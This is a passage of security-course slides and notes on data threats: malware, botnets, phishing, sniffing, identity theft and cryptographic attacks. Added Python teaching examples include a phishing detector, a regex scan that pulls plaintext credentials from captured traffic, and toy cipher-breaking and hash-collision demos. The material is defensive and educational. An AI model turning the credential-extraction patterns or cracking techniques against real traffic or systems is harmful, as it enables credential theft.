Adware: Adware is a type of spyware used by marketers to track Internet users' habits and interests for the
purpose of customizing future advertising material. Adware can monitor information such as the types of sites
visited, articles read, or the types of pop-ups and banners the user clicks on. The information is then used to
customize future advertisements directed to the user, or can be sold to a third party for the same purpose.
Users can minimize their chances of unintentionally downloading spyware onto their computing system by:
- Being wary of banners, ads and pop-ups while surfing the Internet, and not clicking on them no matter
how enticing they may appear
- Reviewing terms and conditions when they install free programs or subscribe to services from the
Internet
- Using an up-to-date anti-spyware program to regularly scan their computer
These programs are often installed without the knowledge of the user and can be bundled with other programs.
Malicious software is downloaded onto the user's system by tracking the behavior of the user on the internet
and showing ads that match the interests of the user. These programs record every step of the user and
forward it to the ad-management center. This center builds up a detailed profile of the user who has been
tracked and accordingly displays ads from which malicious software is downloaded to the user's computer,
and serious threats arise.


Malware Threat (7 of 7)

• Logic Bomb
– This malware is executed when a certain predefined event occurs

– The attack is not started by the bomb; the bomb only tells the attackers that the user to be
attacked has met the needed criteria and is in a state to be attacked

– When a user is logged on to the internet, a logic bomb may send this information to the attacker and
inform the attacker about the files which the user is accessing


Figure 1-22. Malware Threat (7 of 7) DS011.0

Notes:
Logic Bomb: This malware is executed when a certain predefined event occurs. When a user is logged on to
the internet, a logic bomb may send this information to the attacker and inform the attacker about the files
which the user is accessing. The figure shows the working of a logic bomb. Note that the attack is not started
by the bomb; the bomb only tells the attackers that the user to be attacked has met the needed criteria and is
in a state to be attacked. A specific date or circumstance can also be set up as the trigger for a logic bomb.
The figure illustrates how a message is sent by a logic bomb to the system which will conduct the attack. The
attack, which is conducted by an external system, is carried out in 4 steps:
a. Logic bomb implanted
b. Installation reported by the victim
c. Attack message sent by the attacker
d. Victim does as indicated by the logic bomb
The victim's system can then be used to start a massive attack such as a DDoS. It can also be used to gain
access at a time chosen by the attacker.


Types of Data Security Threats (Contd.)

• Network Based Threats

– Network based threats can cause huge harm

– Securing the network is a major part of network security and management

– There has been a huge increase in the number of hackers and other criminals creating malicious
threats over the last five years


Figure 1-23. Types of Data Security Threats (Contd.) DS011.0

Notes:
Network based threats
Security threats that can cause huge harm have increased as more and more people connect to networks.
Securing the network is a major part of what has to be maintained, because information is passed from one
system to another through the network, which makes the information vulnerable to attack. There has been a
huge increase in the number of hackers and other criminals creating malicious threats over the last five years.
Malicious threats are pumped into the network, which makes it vulnerable to attack. Below are some threats
which the network faces:


Network Based Threats (1 of 11)

• Botnet Threat
– A botnet is a number of Internet computers that have been set up to forward transmissions (including
spam or viruses) to other computers on the internet

– This can prove to be a major security threat as the network is acting as a center that is sending
malicious files to other systems

– Cyber criminals consider botnets one of their major tools to carry out a cyber-attack

– HTTP and peer-to-peer channel technology are used nowadays to create botnets


Figure 1-24. Network Based Threats (1 of 11) DS011.0

Notes:
Botnet Threat: A botnet is a number of Internet computers that, although their owners are unaware of it, have
been set up to forward transmissions (including spam or viruses) to other computers on the internet. This can
prove to be a major security threat, as the network, without the knowledge of any user, will be acting as a
center that sends malicious files to other systems connected to the network. Cyber criminals consider botnets
one of their major tools to carry out a cyber-attack. Over time, botnets have also become more robust. HTTP
and peer-to-peer channel technology are used nowadays to create them, and a tiered infrastructure is used to
build them, making them harder to break. Also, botnets can be remotely managed, which means that there is
a very low chance that the culprit will be caught. Any organization needs security expertise to combat the
botnet threat. Though it incurs a certain cost, having security expertise is a good decision, as even a low-scale
botnet attack can be enormous in its effect. An organization can lose its reputation and a huge amount of
money, and can even face lawsuits filed against it. These attacks don't only hamper large companies; smaller
companies are also affected by them.


Network Based Threats (2 of 11)

• Phishing
– This threat lures the victim by showcasing the identity of a trustworthy public platform, and then all the
critical credentials of the victim are retrieved

– The incidents of phishing started to come into the picture in 1995

– Earlier, phishers used to copy source code from the AOL websites and then craft a page which
would look like a part of the website

– Emails are used nowadays to lure the victim


Figure 1-25. Network Based Threats (2 of 11) DS011.0

Notes:
Phishing: This threat is a form of social engineering. In this attack, the victim is lured by the attacker (also
known as a phisher in this case) by showcasing to them the identity of a trustworthy public platform, and then
all the critical credentials of the victim are retrieved. The incidents of phishing started to come into the picture
in 1995, when emails were used by internet scammers to lure victims, and their financial information and
passwords were retrieved. Earlier, phishers used to copy source code from the AOL websites and then craft a
page which would look like a part of the website from which they had copied the code. They would then send
spoofed emails and other messages to the victim. This email would contain a link to the false web page,
asking the victims to enter their passwords. There are 3 roles to be played by the phisher or the attacker in a
phishing attack. The first is to send out a huge number of fraudulent emails through botnets or some other
medium. The second step involves the phisher setting up false websites which are hosted on a compromised
system. This website prompts the victim to supply their confidential and sensitive information. The third and
last role is to use the confidential information which the user has provided to achieve a pay-out. The process
of phishing is demonstrated in the figure given in the next slide.


Network Based Threats (3 of 11)


Figure 1-26. Network Based Threats (3 of 11) DS011.0

Notes:
The diagrammatic explanation of the phishing process has been shown in this figure. The previous slide has
explained this diagram in more detail.


Network Based Threats (4 of 11)

• Types of Phishing Process


– Clone Phishing: A cloned email is created by the phisher in this type of phishing attack to lure the
victim

– Spear Phishing: A specific group is targeted by spear phishing whose members have something in
common between them

– Phone Phishing: As the name suggests, this type of phishing is carried out using mobile phones


Figure 1-27. Network Based Threats (4 of 11) DS011.0

Notes:
Given below are some of the types of phishing process:
Clone Phishing: A cloned email is created by the phisher in this type of phishing attack. This is done by
retrieving the recipient address and content from a legitimate email which has been sent previously. After
retrieving this email, they send the same email to the victim after replacing the links in the mail with malicious
links. Address spoofing is also employed so that the email looks as if it has been sent by the original sender.
Also, it is claimed that the email which was sent later is just an updated version of the email which was sent
earlier, so that the victim believes in the fake process.
Spear Phishing: A specific group is targeted by spear phishing. Spear phishers target a selected group of
people who have something in common with each other instead of targeting different people individually. The
attacker (in this case the spear phisher) targets people who work for a common organization or go to the
same hospital, etc. When this attack is used against a very high-level target, it is known as whaling.
Phone Phishing: In this type, victims are called by the phisher, who claims to be calling from a certain bank.
The victims are asked to share confidential information associated with their bank account on the phone so
that necessary processes can be carried out. IP telephony is easy to manipulate, so phishers use VoIP rather
than the ordinary voice network to carry out these attacks. After the victim dials a phone number owned by the
phisher and provided by a VoIP service, a voice prompts the victim to enter the account number and the PIN
associated with it. Once the victim enters this information, they can be exploited by monetary transactions
made from their account. Caller ID spoofing is used along with this, which makes the call appear as if it has
been made from a trusted source.
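Clone phishing, as described above, rests on two things: a spoofed sender and links rewritten to point somewhere other than the original. Both can be checked mechanically on an incoming message before it reaches a user. The Python below is an added example, not code from the course; the message, the `.test` domain names and the header layout are constructed for the demonstration.

```python
"""Checks that catch the two tricks clone phishing relies on: a sender
address that does not match the envelope, and links whose target differs
from the address shown to the reader. Added illustration; the message and
its domains are constructed."""
import email
import email.utils
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message: From: claims example-bank.test, while Return-Path and
# the first link target point at a look-alike domain.
SAMPLE_RAW = b"""\
Return-Path: <alerts@example-bank-secure.test>
From: "Example Bank" <alerts@example-bank.test>
To: customer@example.test
Subject: Updated statement notice
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please review your <a href="http://example-bank-secure.test/login">
https://www.example-bank.test/login</a> as previously sent.</p>
<p>Help: <a href="https://www.example-bank.test/help">www.example-bank.test/help</a></p>
</body></html>
"""


class _Anchors(HTMLParser):
    """Collect (href, visible text) for every <a> element in the HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(value):
    """Host part of a URL or a bare 'host/path' string, lower-cased."""
    if "://" not in value:
        value = "http://" + value
    return (urlparse(value).hostname or "").lower()


def address_domain(header_value):
    """Domain after '@' in an address header, or '' if there is none."""
    _name, addr = email.utils.parseaddr(str(header_value or ""))
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def analyse(raw):
    """Return findings: a (from, return-path) domain pair when they differ,
    and (shown host, actual host) for each link whose text names a host
    other than the one the href really points to."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = {"sender_mismatch": None, "deceptive_links": []}
    from_dom = address_domain(msg["From"])
    path_dom = address_domain(msg["Return-Path"])
    if path_dom and path_dom != from_dom:
        findings["sender_mismatch"] = (from_dom, path_dom)
    body = msg.get_body(preferencelist=("html",))
    parser = _Anchors()
    parser.feed(body.get_content() if body else "")
    for href, text in parser.links:
        shown = host_of(text)
        # Only compare when the visible text itself looks like a URL or host.
        if shown and "." in shown and shown != host_of(href):
            findings["deceptive_links"].append((shown, host_of(href)))
    return findings


if __name__ == "__main__":
    print(analyse(SAMPLE_RAW))
```

A mail gateway would treat either finding as a reason to quarantine or to rewrite the message with a warning; the link check deliberately ignores anchors whose text is ordinary words, since those carry no visible host for the reader to be misled by.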


Network Based Threats (5 of 11)

• Purposes of Phishing Scam


– Theft of login credentials

– Theft of banking credentials

– Observation of Credit Card details

– Postal address and other personal information

– Theft of confidential documents like trade secrets


Figure 1-28. Network Based Threats (5 of 11) DS011.0

Notes:
Below are some of the common purposes for which phishing scams are carried out:
- Theft of login credentials: Credentials required for accessing online services such as Gmail, Flipkart
etc. are a big target of phishers. The online trading credentials of customers have also become a big
target, as international money transfers can be carried out very easily.
- Theft of banking credentials: The credentials needed to log in to online banking are also a target for
phishers. Huge monetary transactions can be made.
- Observation of Credit Card details: Credit card credentials are of huge value to most criminals. Details
like the credit card number, card validation number, name of the cardholder etc. can be used to make
monetary transactions
- Postal address and other personal information: Marketing companies have a huge demand for
personal information such as address, email id, phone numbers etc.

- Theft of confidential documents like trade secrets: Trade secrets and proposals are a big target of
phishers, as they benefit hugely if they sell these confidential documents to rival companies. The
purposes of acquisition and industrial espionage can be served by spear phishing techniques
- Distribution of DDoS and botnet agents: Phishing scams are used by attackers to install specific
DDoS and bot agents on computers. These agents are added to distributed networks and serve the
purpose of these kinds of attacks
- Attack Propagation: A single host which is in a compromised state can be used as an internal jump
point within an organization for attacks to be carried out in the future. This is carried out by a mixture
of bot agents and spear phishing installations
Thus phishing can be a serious threat when it comes to securing the data of an organization.


Network Based Threats (6 of 11)

• Packet Sniffing
– A packet sniffer is a device or program that allows eavesdropping on traffic travelling between
networked computers

– In a network, a packet sniffer can filter out personal information and this can lead to areas such as
identity theft

– Packet sniffer can intercept and log traffic passing over a digital network or part of a network

– As data streams travel back and forth over the network, the sniffer captures each packet and
eventually decodes it


Figure 1-29. Network Based Threats (6 of 11) DS011.0

Notes:
Packet sniffing: A packet sniffer is a device or program that allows eavesdropping on traffic travelling
between networked computers. The packet sniffer captures data that is addressed to other machines, saving
it for later analysis. In a network, a packet sniffer can filter out personal information, and this can lead to
crimes such as identity theft, so it is a major security threat to a network. A packet sniffer can intercept and
log traffic passing over a digital network or part of a network. As data streams travel back and forth over the
network, the sniffer captures each packet and eventually decodes and analyzes its content according to
whatever criteria it has been given.
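A packet sniffer only yields credentials when they cross the wire unencrypted, so a useful defensive exercise is to audit captured traffic for protocols that still send them in the clear and then move those services to encrypted alternatives. The script below is an added example, not code from the course material; the "packets" are a constructed list of (protocol, port, payload) records standing in for decoded captures, and the report names the exposed protocol and account without reproducing the password.

```python
"""Audit decoded traffic for credentials sent in the clear, the material a
packet sniffer harvests. Added illustration: the packet records below are
constructed stand-ins for decoded captures, not a real trace."""
import base64
import re

# Constructed records: (protocol, destination port, payload bytes).
SAMPLE_PACKETS = [
    ("tcp", 80, b"GET /admin HTTP/1.1\r\nHost: intranet.test\r\n"
                b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") + b"\r\n\r\n"),
    ("tcp", 21, b"USER bob\r\n"),
    ("tcp", 21, b"PASS letmein\r\n"),
    ("tcp", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1"),   # TLS handshake bytes, opaque
    ("tcp", 110, b"PASS s3cret\r\n"),
]

# Ports whose PASS command is a plaintext password (assumed service mapping).
PASS_PROTOCOLS = {21: "ftp", 110: "pop3"}

_PASS_COMMAND = re.compile(rb"^PASS \S+", re.M)
_HTTP_BASIC = re.compile(rb"^Authorization: Basic (\S+)", re.M | re.I)


def cleartext_credentials(packets):
    """Return (port, protocol, account) for each credential found in plaintext.
    Only the account name is reported, never the secret itself; where the
    protocol sends the name in a separate command a marker is used instead."""
    findings = []
    for _proto, port, payload in packets:
        basic = _HTTP_BASIC.search(payload)
        if basic:
            try:
                account = base64.b64decode(basic.group(1)).split(b":", 1)[0]
            except ValueError:
                account = b"?"
            findings.append((port, "http-basic", account.decode(errors="replace")))
            continue
        if _PASS_COMMAND.search(payload):
            findings.append((port, PASS_PROTOCOLS.get(port, "unknown"), "<password command>"))
    return findings


def exposed_ports(packets):
    """Sorted set of destination ports on which any plaintext credential appeared."""
    return sorted({port for port, _name, _acct in cleartext_credentials(packets)})


if __name__ == "__main__":
    for port, name, account in cleartext_credentials(SAMPLE_PACKETS):
        print(f"port {port} ({name}): credential for {account} sent in the clear")
    print("ports to migrate to encrypted transport:", exposed_ports(SAMPLE_PACKETS))
```

The TLS record in the sample produces no finding, which is the point: once the same logins move to HTTPS, FTPS or POP3S the sniffer sees only ciphertext, and the audit's list of ports becomes the migration plan.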


Network Based Threats (7 of 11)

• Identity Theft
– Identity theft is when information which can only be identified personally is used by an unauthorized
party to assume the victim’s identity

– Information such as address, credit card number, name or bank account number is used by the
attacker to commit frauds

– There are many ways by which personal information of the victim can be stolen


Figure 1-30. Network Based Threats (7 of 11) DS011.0

Notes:
Identity theft: When personally identifiable information is used by an unauthorized party to assume the
victim's identity and commit fraud or other criminal acts, the process is known as identity theft. Information
such as address, credit card number, name or bank account number is used by the attacker to commit fraud.
There are many ways by which the personal information of the victim can be stolen. The various ways are
listed in the next slide.


Network Based Threats (8 of 11)

• Identity Theft
– The various ways are listed below:

• By stealing the victim’s purses and wallets

• By stealing the victim’s mail

• By completing a ‘change of address form’

• By diving through the victim’s trash

• By taking personal information of the victim available on the social networking sites


Figure 1-31. Network Based Threats (8 of 11) DS011.0

Notes:
The various ways are listed below:
- By stealing the victim's purses and wallets, which hold their credit cards, bank information and other
identification cards
- By stealing the victim's mail, which contains information such as bank statements, new checks, phone
bills, utility bills etc.
- By completing a 'change of address form' in order to redirect the victim's mail
- By digging through the victim's trash and collecting the personal data which has been discarded. This
practice is known as 'dumpster diving'
- By taking personal information that the victim shares or posts on social networking sites


Network Based Threats (9 of 11)

• Identity Theft (Contd.)


– After stealing the identity of a user, the unauthorized party can do anything with the personal data that
they will get access to. Usually following things can occur:

• Change their mailing address on their credit card account

• Open new lines of credit

• Establish phone services

• Write bad checks on the victim’s name

• Forge checks

• Apply for auto loans


Figure 1-32. Network Based Threats (9 of 11) DS011.0

Notes:
After stealing the identity of a user, the unauthorized party can do anything with the personal data that they
have gained access to. Usually the following things can occur:
- Call their creditors and change their mailing address on their credit card account
- Open new lines of credit using their personal identification information
- Establish phone services using their name which are charged to them
- Open bank accounts in their name and write bad checks.
- Forge checks to wipe out their bank account
- Apply for auto loans taken out in their name


Network Based Threats (10 of 11)

• Password Attacks
– This attack is carried out by determining or finding passwords

– The networks and systems which are password protected can be exploited

– Data available can be breached

– This attack can be carried out online as well


Figure 1-33. Network Based Threats (10 of 11) DS011.0

Notes:
Password attacks: This attack is carried out by determining or finding the passwords to various protected
electronic areas. Password-protected networks and systems can be exploited by attackers if they somehow
determine the passwords to them. The attackers can then steal the data which is available on that system.
This attack can be carried out online as well, as there are many software tools which can obtain passwords
for the attackers.


Network Based Threats (11 of 11)

• Hardware Loss and Residual Data Fragments


– It is one of the growing worries for organizations and governments

– For example: if a number of computer systems are stolen from a single bank, then all the details of the
clients that were stored on those systems are stolen with them

– The attacker can then steal the identity of the clients and commit fraud on a large scale

– The only method to keep hardware safe is to keep it under proper surveillance


Figure 1-34. Network Based Threats (11 of 11) DS011.0

Notes:
Hardware Loss and Residual Data Fragments: One of the growing worries for organizations, and even for
governments, has been residual data fragments and hardware loss. For example: if a number of computer
systems are stolen from a single bank, then all the details of the clients that were stored on those systems are
stolen with them. The attacker can then steal the identity of the clients and commit fraud on a large scale. This
concern has grown significantly over the years. The only method to keep hardware safe is to keep it under
proper surveillance.


Types of Data Security Threats (Contd.)

• Cryptographic Threats
– Confidentiality of data is very important to maintain

– Cryptographic threats can exploit existing loopholes and damage confidentiality

– Several high-profile laptop thefts have raised awareness about the dangers of storing large quantities
of personally identifying information without encrypting it

– Even when encryption is used, threats to confidentiality still exist


Figure 1-35. Types of Data Security Threats (Contd.) DS011.0

Notes:
Cryptographic threats
When sensitive information is transmitted outside of trusted systems, it should be encrypted to preserve
confidentiality. Few consumers would want their credit card information transmitted through the Internet as
plain text. Even when data is stored on an organization's own devices, it is sometimes encrypted to prevent
information theft. Several high-profile laptop thefts have raised awareness about the dangers of storing large
quantities of personally identifying information on mobile devices. Even when encryption is used, threats to
confidentiality still exist. Some of the threats associated with cryptography are explained in the following
slides.


Cryptographic Threats (1 of 7)

• Attacking the key


– The keys are attacked directly in this type of attack to determine their value

– Commonly used passwords, a series of different words or other combinations can be used by an
attacker to crack a password

– A password can be broken by an attacker by using the information and access that many
operating system manufacturers provide


Figure 1-36. Cryptographic Threats (1 of 7) DS011.0

Notes:
Attacking the key: In this type of attack the keys are attacked directly and the value of a key is discovered.
The keys can be the following:
- Key-based encryption information
- Encrypted messages
- Passwords
To crack a password, an attacker can try commonly used passwords, a series of different words, or other
combinations which may be randomly selected. In a key attack the key value is guessed repeatedly in order
to crack the key. Many operating system manufacturers allow access to the encryption and password
subsystem through the programming interfaces they provide. An attacker can use this information and access
to break a password.


Cryptographic Threats (2 of 7)

• Attacking the Algorithm


– The algorithms and programming instructions used for data encryption are at risk as well

– An algorithm cannot make a program secure if errors in the implementation are not corrected

– Back doors are present in many algorithms and can be used to attack the algorithm

– A significant security exposure may exist if a weakness is discovered in the programming


Figure 1-37. Cryptographic Threats (2 of 7) DS011.0

Notes:
Attacking the algorithm: Not only the keys but also the algorithms and the programming instructions that are
used for data encryption are at risk. An algorithm cannot make a program secure if the developers of the
program do not discover and correct errors in it. Well-publicized back doors are present in many algorithms.
A significant security exposure may exist if a weakness is discovered in the model or the programming used
to develop the algorithm.


Cryptographic Threats (3 of 7)

• Intercepting the Transmission


– Attackers may inadvertently gain information about the encryption systems that are in use

– A major problem in this security situation is human error

– A security system can also be undermined by someone unintentionally


Figure 1-38. Cryptographic Threats (3 of 7) DS011.0

Notes:
Intercepting the transmission: By intercepting transmissions over a period of time, attackers may gain
information about the encryption systems used by an organization, including information that was released
inadvertently. The ability of an attacker to break an algorithm using frequency analysis depends on how much
information the attacker can gain. A major problem in security situations is human error. A security system
can be undermined if someone unintentionally releases information and that information is then used against
the security system.


Cryptographic Threats (4 of 7)

• Code-breaking Techniques
– Frequency Analysis

– Algorithm Errors

– Exploiting Human Error


Figure 1-39. Cryptographic Threats (4 of 7) DS011.0

Notes:
Code-breaking techniques: The common code-breaking techniques are explained below:
Frequency Analysis: In frequency analysis, the analyst determines whether any common patterns exist. This
is done by looking at an encrypted message and the blocks associated with it. The analyst first looks at the
patterns of the message and does not yet try to break the code. A determined cryptanalyst who looks for these
types of patterns can deduce the method used for data encryption. This process may take a huge amount of
effort or at times can be very simple.
Algorithm Errors: A set of instructions used to do a particular task is called an algorithm. Algorithms are
implemented in programs to perform recurring operations in a computer. Complex algorithms sometimes
produce unpredictable results. The entire encryption system can be compromised if these results are
discovered. There can be fundamental flaws in the design of cryptographic systems. A flaw or an error in the
implementation or design of the steps creates a weakness in the entire coding system. Regardless of the
number of steps used for code processing or the complexity of the algorithm, this weakness in the
implementation or design of the steps may lead to the decryption of the coding system.
Exploiting Human Error: Many vulnerabilities arise from human error. Someone can send an email in
unencrypted or clear form even though the same email was also sent using an encryption scheme. If a
cryptanalyst has both messages, then decoding future messages will be easy. The key's secrets can be
exposed if a code key winds up in the wrong hands. Accidents of this type have resulted in the breaking of
many systems.
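Frequency analysis and the leaked-plaintext case described above, worked on a toy Caesar shift cipher as an added example (not code from the course): the shift is recovered from letter statistics alone, and falls out of a single letter pair once a clear copy of the same message leaks. The sample message, its key and the English frequency table are constructed for the demo.

```python
"""Added example (not from the IBM course): frequency analysis, and the
cost of a leaked plaintext, demonstrated on a toy Caesar shift cipher."""
from collections import Counter
import string

# Approximate relative frequencies of letters in English text (percent).
ENGLISH_FREQ = {
    'a': 8.2, 'b': 1.5, 'c': 2.8, 'd': 4.3, 'e': 12.7, 'f': 2.2, 'g': 2.0,
    'h': 6.1, 'i': 7.0, 'j': 0.15, 'k': 0.77, 'l': 4.0, 'm': 2.4, 'n': 6.7,
    'o': 7.5, 'p': 1.9, 'q': 0.095, 'r': 6.0, 's': 6.3, 't': 9.1, 'u': 2.8,
    'v': 0.98, 'w': 2.4, 'x': 0.15, 'y': 2.0, 'z': 0.074,
}
ALPHABET = string.ascii_lowercase


def caesar(text: str, shift: int) -> str:
    """Shift every letter by `shift` positions; non-letters pass through."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = 'A' if ch.isupper() else 'a'
            out.append(chr((ord(ch) - ord(base) + shift) % 26 + ord(base)))
        else:
            out.append(ch)
    return ''.join(out)


def letter_frequencies(text: str) -> dict:
    """Relative frequency (percent) of each letter in `text`."""
    letters = [c for c in text.lower() if c in ALPHABET]
    counts = Counter(letters)
    total = len(letters) or 1
    return {c: 100.0 * counts[c] / total for c in ALPHABET}


def chi_squared(observed: dict) -> float:
    """How far `observed` deviates from English frequencies; lower is closer."""
    return sum((observed[c] - ENGLISH_FREQ[c]) ** 2 / ENGLISH_FREQ[c]
               for c in ALPHABET)


def recover_shift(ciphertext: str) -> int:
    """Frequency analysis: try all 26 shifts and keep the one whose
    decryption has the most English-looking letter pattern."""
    scores = {s: chi_squared(letter_frequencies(caesar(ciphertext, -s)))
              for s in range(26)}
    return min(scores, key=scores.get)


def shift_from_known_pair(plaintext: str, ciphertext: str) -> int:
    """The human-error case: when both the clear and the encrypted form of
    one message are available, the key comes from a single letter pair."""
    for p, c in zip(plaintext, ciphertext):
        if p.isalpha() and c.isalpha():
            return (ord(c.lower()) - ord(p.lower())) % 26
    raise ValueError("no letter pair to compare")


# Constructed sample message; the key (shift 7) is chosen for the demo only.
SAMPLE = ("The quarterly audit report must be delivered to the finance team "
          "before the board meeting on Thursday morning")
SAMPLE_KEY = 7
CIPHER = caesar(SAMPLE, SAMPLE_KEY)

if __name__ == "__main__":
    print("ciphertext:", CIPHER)
    print("shift recovered by frequency analysis:", recover_shift(CIPHER))
    print("shift from leaked plaintext/ciphertext pair:",
          shift_from_known_pair(SAMPLE, CIPHER))
```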


Cryptographic Threats (5 of 7)

• Birthday Attack
– A birthday attack is an attack which is targeted at a key

– For example: if there are 25 people sitting in a room, there is a good probability that at least two of
them have their birthday on the same date

– Likewise, if one key of an organization is determined, then there is a possibility that some other key
will resemble the determined key

– This attack is based on probability of occurrence


Figure 1-40. Cryptographic Threats (5 of 7) DS011.0

Notes:
Birthday Attack: An attack which is targeted at a key is an example of a birthday attack. This method attacks
the results and not the algorithm itself. A birthday attack is built on a simple premise. If there are 25 people
sitting in a room, there is a good probability that at least two of them have their birthday on the same date.
With every additional person entering the room, this probability increases. It is important to understand what
probability is: it does not mean that the occurrence of an event is certain; it is a term which says that an event
is likely to occur or happen.
In each meeting, the likelihood is fairly high that two persons have their birthday on the same day. The odds
of finding two people with the same birthday increase as the number of people entering the room increases.
The premise of a birthday attack is the same: if the key of an infrastructure is hashed, there is a possibility that,
given enough time, another value can be created which produces the same hash value. Even MD5 has been
shown to be susceptible to a birthday attack.
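The birthday premise above, carried through in numbers as an added example (not code from the course): the probability for a room of people, and then the same effect on a hash function deliberately truncated to a few bits, where a collision appears after roughly the square root of the number of possible outputs. The truncation and the input messages are constructed for the demo; real hash functions keep all their bits precisely to push this bound out of reach.

```python
"""Added example (not from the IBM course): the birthday bound, first for
people in a room and then for a hash function truncated to few bits."""
import hashlib
import math


def prob_shared_birthday(people: int, days: int = 365) -> float:
    """Probability that at least two of `people` share a birthday."""
    p_all_distinct = 1.0
    for k in range(people):
        p_all_distinct *= (days - k) / days
    return 1.0 - p_all_distinct


def expected_trials_for_collision(bits: int) -> float:
    """Rough number of random inputs needed before two of them collide on a
    `bits`-bit hash: about sqrt(pi/2 * 2**bits), not 2**bits."""
    return math.sqrt(math.pi / 2 * 2 ** bits)


def truncated_hash(data: bytes, bits: int) -> int:
    """SHA-256 cut down to its top `bits` bits. Constructed so that a collision
    is findable in a demo; a real deployment never truncates like this."""
    digest = hashlib.sha256(data).digest()
    return int.from_bytes(digest, "big") >> (256 - bits)


def find_collision(bits: int):
    """Feed distinct constructed inputs to the truncated hash until two of
    them produce the same value. Returns (first_input, second_input, trials)."""
    seen = {}
    i = 0
    while True:
        msg = f"constructed-message-{i}".encode()
        h = truncated_hash(msg, bits)
        if h in seen:
            return seen[h], msg, i + 1
        seen[h] = msg
        i += 1


if __name__ == "__main__":
    print(f"25 people: P(shared birthday) = {prob_shared_birthday(25):.3f}")
    bits = 24
    a, b, trials = find_collision(bits)
    print(f"{bits}-bit hash: collision after {trials} trials "
          f"(birthday estimate {expected_trials_for_collision(bits):.0f}, "
          f"a brute-force preimage would need about {2 ** bits})")
```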


Cryptographic Threats (6 of 7)

• Weak Key Attack


– Passwords which are common in nature are used by many people; this threat exploits that loophole

– The hash value resulting from the key will be very easy to guess if the length of the key is short

– Passwords must be made more complicated to mitigate this threat


Figure 1-41. Cryptographic Threats (6 of 7) DS011.0

Notes:
Weak Key Attack: The basis of these attacks is that many people use passwords which are common in
nature. The hash value resulting from the key will be very easy to guess if the length of the key is short. The
security team must make sure that the employees of the organization are using strong encryption keys and
passwords that cannot be guessed easily. The security team may also consider a system which generates
random passwords. Launching a weak key attack becomes more difficult if the password is made more
complicated and longer.


Cryptographic Threats (7 of 7)

• Mathematical Attack
– These kinds of attacks are basically focused on the following things:

• The encryption algorithm

• Any potential weakness area or the key mechanism

• Statistical analysis and mathematical modeling are used by these attacks to determine the
operation of the system

• Interception of huge amounts of data

• Attempting to decrypt the message methodically


Figure 1-42. Cryptographic Threats (7 of 7) DS011.0

Notes:
Mathematical Attack: A mathematical attack is an assault on key personal information, i.e. passwords, by
decrypting the password using highly advanced mathematical sequences. This process can take anything
from a matter of minutes to weeks depending on how diverse the password is; for example, if the password is
just 6-10 letters long and all lower case it can take minutes, but if it includes various numbers, letters and
upper case letters it could take days or weeks. Generally mathematical attacks are only used against weak
passwords because of the amount of time it takes to decrypt a versatile password, but the more powerful the
computer and software an intruder has, the less time it will take. To avoid falling victim to a mathematical
attack, an organization should have a password which is related to it and yet is totally random, as well as a
stronger encryption key. This slide lists the various things on which this threat is focused.
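The weak key and mathematical attack passages both come down to the size of the space an attacker has to search. As an added example (not code from the course), the block below puts numbers on the "minutes versus days" claim for a given guess rate, flags passwords that draw from too small a space, and generates random passwords with the standard library, the mitigation the weak key slide recommends. The guess rate of one billion per second is an assumption chosen for the demo, not a figure from the course.

```python
"""Added example (not from the IBM course): how long exhaustive guessing of a
password takes at an assumed rate, and how to avoid issuing weak ones."""
import math
import secrets
import string

# Assumed attacker capability for the estimate; not a figure from the course.
ASSUMED_GUESSES_PER_SECOND = 1e9


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of distinct passwords of `length` drawn from `alphabet_size` symbols."""
    return alphabet_size ** length


def seconds_to_search(alphabet_size: int, length: int,
                      rate: float = ASSUMED_GUESSES_PER_SECOND) -> float:
    """Expected time to hit the right password: on average half the keyspace."""
    return keyspace(alphabet_size, length) / 2 / rate


def describe(seconds: float) -> str:
    """Human-readable duration, largest unit first."""
    for unit, size in (("years", 365 * 86400), ("days", 86400),
                       ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"


def charset_size(password: str) -> int:
    """Size of the alphabet an attacker must assume, from the character
    classes actually present in the password."""
    size = 0
    if any(c in string.ascii_lowercase for c in password):
        size += 26
    if any(c in string.ascii_uppercase for c in password):
        size += 26
    if any(c in string.digits for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)
    return size


def password_bits(password: str) -> float:
    """log2 of the keyspace the password is drawn from; 0 for an empty one."""
    size = charset_size(password)
    return len(password) * math.log2(size) if size else 0.0


def is_weak(password: str, min_bits: float = 60) -> bool:
    """Policy threshold (60 bits) is a demo assumption, not a course figure."""
    return password_bits(password) < min_bits


def generate_password(length: int = 16,
                      alphabet: str = string.ascii_letters + string.digits
                      + string.punctuation) -> str:
    """Random password from the CSPRNG; `random.choice` is not suitable here."""
    return ''.join(secrets.choice(alphabet) for _ in range(length))


if __name__ == "__main__":
    # The slide's two cases: 8 lower-case letters versus 8 mixed characters.
    print("8 lower-case letters:", describe(seconds_to_search(26, 8)))
    print("8 mixed letters+digits:", describe(seconds_to_search(62, 8)))
    print("16 chars incl. punctuation:", describe(seconds_to_search(94, 16)))
    pw = generate_password()
    print("generated:", pw, "weak?", is_weak(pw))
```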


Types of Data Security Threats

• Database Security Threats


– The database infrastructure of any organization faces a huge array of threats

– Critical information stored on the database makes it a target for the cyber criminals

– Cyber criminals can earn a huge amount of profit by breaching the databases of an organization


Figure 1-43. Types of Data Security Threats DS011.0

Notes:
Database Security Threats
The database infrastructure of any organization faces a huge array of threats. Databases have plenty of
valuable critical information stored in them, which makes them a target for cyber criminals. A database can
hold data of financial importance, corporate secrets or other intellectual property which, if stolen, can have a
huge impact on an organization. Cyber criminals can earn a huge amount of profit by breaching the databases
of an organization. The threats which the database of any organization faces are described in the next slides.


Database Security Threats (1 of 6)

• Excessive Privilege Abuse


